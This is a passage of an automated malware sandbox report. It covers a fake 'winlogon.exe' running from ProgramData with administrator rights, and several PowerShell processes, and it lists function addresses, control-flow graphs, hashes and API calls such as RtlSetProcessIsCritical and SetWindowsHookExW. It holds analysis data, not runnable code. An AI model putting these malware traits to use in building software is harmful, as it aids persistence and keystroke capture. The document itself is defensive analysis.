                                Wow64 process (32bit):false
                                Commandline:C:\ProgramData\winlogon.exe
                                Imagebase:0x8e0000
                                File size:60'416 bytes
                                MD5 hash:F2A18B995A82E938AB6A067491AA0D79
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:20.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:6
                                  Total number of Limit Nodes:0
                                  execution_graph 3629 7ff848e63abd 3630 7ff848e63aef RtlSetProcessIsCritical 3629->3630 3632 7ff848e63ba2 3630->3632 3625 7ff848e63fe8 3627 7ff848e63ff1 SetWindowsHookExW 3625->3627 3628 7ff848e640c1 3627->3628

                                  Executed Functions

                                  Function 00007FF848E69696 Relevance: .5, Instructions: 471COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 269 7ff848e69696-7ff848e696a3 270 7ff848e696ae-7ff848e69777 269->270 271 7ff848e696a5-7ff848e696ad 269->271 275 7ff848e69779-7ff848e69782 270->275 276 7ff848e697e3 270->276 271->270 275->276 278 7ff848e69784-7ff848e69790 275->278 277 7ff848e697e5-7ff848e6980a 276->277 285 7ff848e6980c-7ff848e69815 277->285 286 7ff848e69876 277->286 279 7ff848e697c9-7ff848e697e1 278->279 280 7ff848e69792-7ff848e697a4 278->280 279->277 281 7ff848e697a8-7ff848e697bb 280->281 282 7ff848e697a6 280->282 281->281 284 7ff848e697bd-7ff848e697c5 281->284 282->281 284->279 285->286 288 7ff848e69817-7ff848e69823 285->288 287 7ff848e69878-7ff848e69920 286->287 299 7ff848e6998e 287->299 300 7ff848e69922-7ff848e6992c 287->300 289 7ff848e6985c-7ff848e69874 288->289 290 7ff848e69825-7ff848e69837 288->290 289->287 292 7ff848e6983b-7ff848e6984e 290->292 293 7ff848e69839 290->293 292->292 295 7ff848e69850-7ff848e69858 292->295 293->292 295->289 301 7ff848e69990-7ff848e699b9 299->301 300->299 302 7ff848e6992e-7ff848e6993b 300->302 308 7ff848e699bb-7ff848e699c6 301->308 309 7ff848e69a23 301->309 303 7ff848e6993d-7ff848e6994f 302->303 304 7ff848e69974-7ff848e6998c 302->304 306 7ff848e69953-7ff848e69966 303->306 307 7ff848e69951 303->307 304->301 306->306 310 7ff848e69968-7ff848e69970 306->310 307->306 308->309 311 7ff848e699c8-7ff848e699d6 308->311 312 7ff848e69a25-7ff848e69ab6 309->312 310->304 313 7ff848e69a0f-7ff848e69a21 311->313 314 7ff848e699d8-7ff848e699ea 311->314 320 7ff848e69abc-7ff848e69acb 312->320 313->312 315 7ff848e699ee-7ff848e69a01 314->315 316 7ff848e699ec 314->316 315->315 318 7ff848e69a03-7ff848e69a0b 315->318 316->315 318->313 321 7ff848e69acd 320->321 322 7ff848e69ad3-7ff848e69b38 call 7ff848e69b54 320->322 321->322 329 7ff848e69b3f-7ff848e69b53 322->329 330 7ff848e69b3a 322->330 330->329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3363634066.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff848e60000_1bE8S5sN9S.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be9078802e6396b1b43505f60f99a9af7ffb0d9be5572bf3d7970e58d1510407
                                  • Instruction ID: 28f3e5d501050525f461e5cf3b7ecb8bfc20e3d1b84bea0a6104fde50b5ccc3e
                                  • Opcode Fuzzy Hash: be9078802e6396b1b43505f60f99a9af7ffb0d9be5572bf3d7970e58d1510407
                                  • Instruction Fuzzy Hash: F0F1A13090CA8D8FEBA9EF28C8557E977E1FF54350F44426EE84DC7295CB34A9458B82
                                  Function 00007FF848E6A442 Relevance: .5, Instructions: 457COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 331 7ff848e6a442-7ff848e6a44f 332 7ff848e6a45a-7ff848e6a527 331->332 333 7ff848e6a451-7ff848e6a459 331->333 337 7ff848e6a529-7ff848e6a532 332->337 338 7ff848e6a593 332->338 333->332 337->338 340 7ff848e6a534-7ff848e6a540 337->340 339 7ff848e6a595-7ff848e6a5ba 338->339 347 7ff848e6a5bc-7ff848e6a5c5 339->347 348 7ff848e6a626 339->348 341 7ff848e6a579-7ff848e6a591 340->341 342 7ff848e6a542-7ff848e6a554 340->342 341->339 343 7ff848e6a558-7ff848e6a56b 342->343 344 7ff848e6a556 342->344 343->343 346 7ff848e6a56d-7ff848e6a575 343->346 344->343 346->341 347->348 350 7ff848e6a5c7-7ff848e6a5d3 347->350 349 7ff848e6a628-7ff848e6a64d 348->349 356 7ff848e6a64f-7ff848e6a659 349->356 357 7ff848e6a6bb 349->357 351 7ff848e6a60c-7ff848e6a624 350->351 352 7ff848e6a5d5-7ff848e6a5e7 350->352 351->349 354 7ff848e6a5eb-7ff848e6a5fe 352->354 355 7ff848e6a5e9 352->355 354->354 358 7ff848e6a600-7ff848e6a608 354->358 355->354 356->357 359 7ff848e6a65b-7ff848e6a668 356->359 360 7ff848e6a6bd-7ff848e6a6eb 357->360 358->351 361 7ff848e6a66a-7ff848e6a67c 359->361 362 7ff848e6a6a1-7ff848e6a6b9 359->362 367 7ff848e6a6ed-7ff848e6a6f8 360->367 368 7ff848e6a75b 360->368 363 7ff848e6a67e 361->363 364 7ff848e6a680-7ff848e6a693 361->364 362->360 363->364 364->364 366 7ff848e6a695-7ff848e6a69d 364->366 366->362 367->368 370 7ff848e6a6fa-7ff848e6a708 367->370 369 7ff848e6a75d-7ff848e6a835 368->369 380 7ff848e6a83b-7ff848e6a84a 369->380 371 7ff848e6a70a-7ff848e6a71c 370->371 372 7ff848e6a741-7ff848e6a759 370->372 373 7ff848e6a71e 371->373 374 7ff848e6a720-7ff848e6a733 371->374 372->369 373->374 374->374 376 7ff848e6a735-7ff848e6a73d 374->376 376->372 381 7ff848e6a84c 380->381 382 7ff848e6a852-7ff848e6a8b4 call 7ff848e6a8d0 380->382 381->382 389 7ff848e6a8bb-7ff848e6a8cf 382->389 390 7ff848e6a8b6 382->390 390->389
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3363634066.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff848e60000_1bE8S5sN9S.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26b7ff6f83623f4a364a6db032ef5bc1b2467ed9145ad00e127c05dc6f5d7bd9
                                  • Instruction ID: 4fe1a3cbd5243e0af0b87cb009b71ac89d3b8f1b89a56beb4a608e2a11026d98
                                  • Opcode Fuzzy Hash: 26b7ff6f83623f4a364a6db032ef5bc1b2467ed9145ad00e127c05dc6f5d7bd9
                                  • Instruction Fuzzy Hash: CAE1C13090CA8E8FEBA8EF28C8557E977E1FF54350F44426AD84DC7291DF74A8918B81
                                  Function 00007FF848E63ABD Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 162 7ff848e63abd-7ff848e63ba0 RtlSetProcessIsCritical 166 7ff848e63ba8-7ff848e63bdd 162->166 167 7ff848e63ba2 162->167 167->166
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3363634066.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff848e60000_1bE8S5sN9S.jbxd
                                  Similarity
                                  • API ID: CriticalProcess
                                  • String ID:
                                  • API String ID: 2695349919-0
                                  • Opcode ID: 853a657ff58d77d3d7de6fd49904ba03b24e828f541429b8442ff007cc3b87d3
                                  • Instruction ID: fc5c46d519cd78727b182ba2f5a18e1379d7173da99e21f9fa2abec4f1294aac
                                  • Opcode Fuzzy Hash: 853a657ff58d77d3d7de6fd49904ba03b24e828f541429b8442ff007cc3b87d3
                                  • Instruction Fuzzy Hash: 1B41E43180C6598FD719DFA8D845AE9BBF0FF56311F08416ED08AC3592CB74A846CB91
                                  Function 00007FF848E63FE8 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 169 7ff848e63fe8-7ff848e63fef 170 7ff848e63ffa-7ff848e6406d 169->170 171 7ff848e63ff1-7ff848e63ff9 169->171 175 7ff848e640f9-7ff848e640fd 170->175 176 7ff848e64073-7ff848e64080 170->176 171->170 177 7ff848e64082-7ff848e640bf SetWindowsHookExW 175->177 176->177 179 7ff848e640c7-7ff848e640f8 177->179 180 7ff848e640c1 177->180 180->179
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3363634066.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff848e60000_1bE8S5sN9S.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: eb33330b382f1d182ff76d3b6225e944113ea6c2b1a68aa4da8b0ddc16f69858
                                  • Instruction ID: 2966d63add9e1fba48386adf14c4421863eb16d844a0980ca6059f172f1765a9
                                  • Opcode Fuzzy Hash: eb33330b382f1d182ff76d3b6225e944113ea6c2b1a68aa4da8b0ddc16f69858
                                  • Instruction Fuzzy Hash: EB410831A0CA5D9FDB58EB6C98466F9BBE1FB59321F04023ED009D3192CB74A8528BC5

                                  Executed Functions

                                  Function 00007FF848F56605 Relevance: .4, Instructions: 434COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2218555443.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 875015cfd3a71c7ea8c2bf195479dd6234a8b14a6ddc324d6059a8d49f5267f3
                                  • Instruction ID: 789fb9064dd71f5f913a4e47d3e343c330a712508cf47f5ffc77c303806a39d1
                                  • Opcode Fuzzy Hash: 875015cfd3a71c7ea8c2bf195479dd6234a8b14a6ddc324d6059a8d49f5267f3
                                  • Instruction Fuzzy Hash: D1C16731E0EA8A5FE795AB2858145B5BBE0EF16794F1801FAD02DCB1D3EE1CAC05C356
                                  Function 00007FF848F54073 Relevance: .2, Instructions: 182COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2218555443.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd6126ef9c99e2bc64a5f074e9942b43d80a760e5068ddf7d041dc7e5d1721bc
                                  • Instruction ID: 5dfbd9d29521d912cc0d5a7f15365e8ed4be4251b24e66da805a309d2e390c4e
                                  • Opcode Fuzzy Hash: cd6126ef9c99e2bc64a5f074e9942b43d80a760e5068ddf7d041dc7e5d1721bc
                                  • Instruction Fuzzy Hash: C451F332E0DE564FE7AAAB2C54116B4B7E2FFA5260F1901BAC00EC75D7DF14E8158389
                                  Function 00007FF848F54370 Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2218555443.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2f46ec050836ab2026609c8293df52b60dd42eeaf6ac10e3c89a8482c4e8897
                                  • Instruction ID: 80bca45045d51f15f8ca52536c663604d8e2bb7863299559337d23700bed8145
                                  • Opcode Fuzzy Hash: a2f46ec050836ab2026609c8293df52b60dd42eeaf6ac10e3c89a8482c4e8897
                                  • Instruction Fuzzy Hash: 5C411472E0DA654FE7A9EB2CA4106B8B7E1EF55760F0800BAD44EC71D7EB18EC118395
                                  Function 00007FF848E89768 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2217937779.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c256655e9878ac448b8200d2bce216862965239a9c871bedc67e24e31c712f5
                                  • Instruction ID: 2d4e501628db66005a41a2cd714fcbd66272804afb57dcf864cf156ec5da134b
                                  • Opcode Fuzzy Hash: 3c256655e9878ac448b8200d2bce216862965239a9c871bedc67e24e31c712f5
                                  • Instruction Fuzzy Hash: B031D63191CA489FDB5CEF5CA80A6BD7BE1FB99710F00422FE44993251DB31A856CBC6
                                  Function 00007FF848D6E380 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2217513473.00007FF848D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D6D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848d6d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2628345fa7009625abaad89608258aa7670b326e58f04ca8d02c6425f28e73ab
                                  • Instruction ID: f2fd06d76b0cd94ecfad12c82bc65e22e4095eefb2427ad53d0baf820e3c0fc2
                                  • Opcode Fuzzy Hash: 2628345fa7009625abaad89608258aa7670b326e58f04ca8d02c6425f28e73ab
                                  • Instruction Fuzzy Hash: 5C41167180EBC84FD7569B399845A563FF0EF52351F2501EFE088CB1A7D725A80AC792
                                  Function 00007FF848E8A748 Relevance: .1, Instructions: 98COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2217937779.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b382db28fd9ed6b046e3f318e42923ddea0133f4d48223de04171b4eff5efc9
                                  • Instruction ID: 8d4fa2b1cfb96dcd56b3cb0c9dc0824423c71305334655ea28d6d5449c22afb0
                                  • Opcode Fuzzy Hash: 6b382db28fd9ed6b046e3f318e42923ddea0133f4d48223de04171b4eff5efc9
                                  • Instruction Fuzzy Hash: D521B33190CA4C8FDB58DF9C984A7E97BE0EB95321F04816FD44DD3152D6709456CB92
                                  Function 00007FF848F540BF Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2218555443.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29061a7789122ddba1e6ce54107c3be44b0309de466e32dc11d7dbdd90170c3c
                                  • Instruction ID: 886bafabb4f65f2a52a835579c3976d4e044be18677fa65ba07085fe11190625
                                  • Opcode Fuzzy Hash: 29061a7789122ddba1e6ce54107c3be44b0309de466e32dc11d7dbdd90170c3c
                                  • Instruction Fuzzy Hash: 6521DD72E0DAA74FE7AAEB185451174A6E2FF752A0F5900BAC01EC71E7CF18EC058349
                                  Function 00007FF848E8A070 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2217937779.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbe0a09fdcce293c3e2c0ee213d9f9ceaf4dab7b942dfbf4098aae3ef1e98a71
                                  • Instruction ID: fe3f84264a696c56909e03ad1de25578eec37722abfc447d964da5ae959f5f8d
                                  • Opcode Fuzzy Hash: dbe0a09fdcce293c3e2c0ee213d9f9ceaf4dab7b942dfbf4098aae3ef1e98a71
                                  • Instruction Fuzzy Hash: 742105B2C0DA890FD719BF2898560F93BA0FF11785F0800BAC18987153EFB890568F87
                                  Function 00007FF848F543BC Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2218555443.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7014134dbf2369bd06cb60e2e4f298b22a07a186c6ab78cd680113639db5d6af
                                  • Instruction ID: b76871679e25ae5dbe5151dd2851a5c245ff899e95d40ce3dba766f7b78bc988
                                  • Opcode Fuzzy Hash: 7014134dbf2369bd06cb60e2e4f298b22a07a186c6ab78cd680113639db5d6af
                                  • Instruction Fuzzy Hash: F711C272D0E9664FE7A8EB2894505B8B7E0FF653A0F4900FAD41DC71E7DB18AC608395
                                  Function 00007FF848E833B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2217937779.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45

                                  Non-executed Functions

                                  Function 00007FF848E88BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2217937779.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                  • API String ID: 0-3225005683
                                  • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                  • Instruction ID: 17702d6d419c973b3dcfffe8cc1d69170a46e6d85154fa4015b62ff361fc743e
                                  • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                  • Instruction Fuzzy Hash: 422126F76488256ED3097BBDF8045FD3740DF942B4B49A2B2D2988B003EB1470868EE4

                                  Executed Functions

                                  Function 00007FF848E6644D Relevance: .7, Instructions: 660COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2330681953.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f9f9484e9547df115fafde677999bf155840f22e5ae16d4e2a72c4dec3f651a
                                  • Instruction ID: 519c0f098a51464de129a9047fca855ecd916de2746a41eaf167048bca357ee3
                                  • Opcode Fuzzy Hash: 8f9f9484e9547df115fafde677999bf155840f22e5ae16d4e2a72c4dec3f651a
                                  • Instruction Fuzzy Hash: E2C14E31A18A4DCFDF98EF58C455AA9BBE1FF68340F54416AD409D72A6CB34F881CB80
                                  Function 00007FF848F36605 Relevance: .4, Instructions: 434COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2331332384.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3781b469ddceedd7ce87b4c4dbd0d4b5de4ca1fc60bf6047bc6ac693c6f6c56
                                  • Instruction ID: c1201e177ce5df6a6256e6a0a4740d654f6b54507cbab59803a3a0819e56ef2c
                                  • Opcode Fuzzy Hash: c3781b469ddceedd7ce87b4c4dbd0d4b5de4ca1fc60bf6047bc6ac693c6f6c56
                                  • Instruction Fuzzy Hash: A2D10031D0EA8A5FE799AB2858155B5BBE0EF1A394F1801FBD44DCB0D3EE1CA8058365
                                  Function 00007FF848E69780 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2330681953.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd6442dfadd650f151571570852e7816a1301f9e4f825eb7c1a446c7bf19405f
                                  • Instruction ID: d2f44ff146fd2518b2f0cdf9ea467844c8251d6a922915ef512790f7eac046be
                                  • Opcode Fuzzy Hash: fd6442dfadd650f151571570852e7816a1301f9e4f825eb7c1a446c7bf19405f
                                  • Instruction Fuzzy Hash: 6531E93191CB884FDB199B5C98066A97BE0FB95710F00426FE449D3252CA71B856CBC6
                                  Function 00007FF848D4E540 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2329982320.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848d4d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 772b47eea5ef2f7db842a4bcd5e505f4d893a6b4ad98faa019ce69fd1888a504
                                  • Instruction ID: 9b9d6e4a29a156e8e0a5adecb02948f6f4b56c4be1abb09f2b57238bc8537f03
                                  • Opcode Fuzzy Hash: 772b47eea5ef2f7db842a4bcd5e505f4d893a6b4ad98faa019ce69fd1888a504
                                  • Instruction Fuzzy Hash: 0441247080EBC45FE7969B389841A523FF0EF52320F1506DFD088CB1A3D625A84AC792
                                  Function 00007FF848E6A49C Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2330681953.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03fdb74ab6162d5bb90d73a3ef98f816233d2a88ea77122079d50739380596b4
                                  • Instruction ID: 9acab16e5baeee1a649553516b0898b5a18a8bb2410d74a1de1d2de5a1e6b8d8
                                  • Opcode Fuzzy Hash: 03fdb74ab6162d5bb90d73a3ef98f816233d2a88ea77122079d50739380596b4
                                  • Instruction Fuzzy Hash: A421F23190CB8C4FDB59DBAC984A6E97FE0EB96320F04416FD048C3152DA74A85ACB92
                                  Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2330681953.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                  Function 00007FF848E6A0FB Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2330681953.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52eb79bb7a9ec98f35b23f0f087eba02f60b05b5604adf63760d5885840ee730
                                  • Instruction ID: 37150085fdbb26318eca48690ed4db18d4dbfda9193e17521b0e68ad37c365c5
                                  • Opcode Fuzzy Hash: 52eb79bb7a9ec98f35b23f0f087eba02f60b05b5604adf63760d5885840ee730
                                  • Instruction Fuzzy Hash: A9F0CD76948A884FDB81EF2C98691E8BFA0FFA5205B0400ABD508C7061EB31AC58CB81
                                  Function 00007FF848F3414D Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2331332384.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ea5e949a609025cd4345b2a94fb41c616c111881f70aadbd5d87c2d2612b3b2
                                  • Instruction ID: 8d18620d29373d5b8a87bf69e5e7cacfb9191f5c31d496c8fd20799ec238d5a8
                                  • Opcode Fuzzy Hash: 4ea5e949a609025cd4345b2a94fb41c616c111881f70aadbd5d87c2d2612b3b2
                                  • Instruction Fuzzy Hash: 5DF09A32A0C9058FD69AFB4CE4008A873E0FF64360B2100FBE01DC71A3CB26EC408748
                                  Function 00007FF848F34400 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2331332384.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e0367ef1a3f7b6711cc9ecddb1fd5ec9110da89d62d1017538b395830d31c70
                                  • Instruction ID: 03226828e9fbd514d95f59dc52d09bb419703b1f48038671bdcc53149d92672c
                                  • Opcode Fuzzy Hash: 0e0367ef1a3f7b6711cc9ecddb1fd5ec9110da89d62d1017538b395830d31c70
                                  • Instruction Fuzzy Hash: B3F0B832A0C5448FE798EB4CE4408A8B3F0FF64320B2100F7E009CB0A3DB2AEC608758
                                  Function 00007FF848F341D1 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2331332384.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: 09613a87b3afa4a6477601c675d6bc6428512a03b2ca1351243ad063737339a8
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: 34E01A31B0C8088FDAAAEB4CE0409A973E1FBB8361B1101B7D14EC75A1CB22EC518B84

                                  Non-executed Functions

                                  Function 00007FF848E68BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
